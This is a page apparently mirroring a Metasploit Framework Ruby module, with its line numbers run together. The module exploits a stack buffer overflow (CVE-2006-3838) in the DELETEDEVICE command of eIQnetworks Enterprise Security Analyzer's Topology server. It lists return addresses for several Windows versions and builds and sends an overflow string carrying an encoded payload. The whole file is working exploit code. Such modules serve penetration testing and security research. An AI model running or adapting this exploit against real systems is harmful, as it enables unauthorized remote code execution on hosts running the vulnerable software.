Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in eIQnetworks15Enterprise Security Analyzer. During the processing of16long arguments to the DELETEDEVICE command in the Topology17server, a stack-based buffer overflow occurs.1819This module has only been tested against ESA v2.1.13.20},21'Author' => 'MC',22'References' =>23[24['CVE', '2006-3838'],25['OSVDB', '27528'],26['BID', '19164'],27],28'DefaultOptions' =>29{30'EXITFUNC' => 'seh',31},32'Payload' =>33{34'Space' => 250,35'BadChars' => "\x00\x0a\x0d\x20",36'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",37},38'Platform' => 'win',39'Targets' =>40[41[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],42[ 'Windows XP SP2 English', { 'Ret' => 0x77d57447 } ],43[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],44],45'Privileged' => false,46'DisclosureDate' => '2006-07-25'47))4849register_options(50[51Opt::RPORT(10628)52])53end5455def exploit56connect5758print_status("Trying target #{target.name}...")5960filler = rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)6162sploit = "DELETEDEVICE&" + filler + payload.encoded6364sock.put(sploit)6566handler67disconnect68end69end707172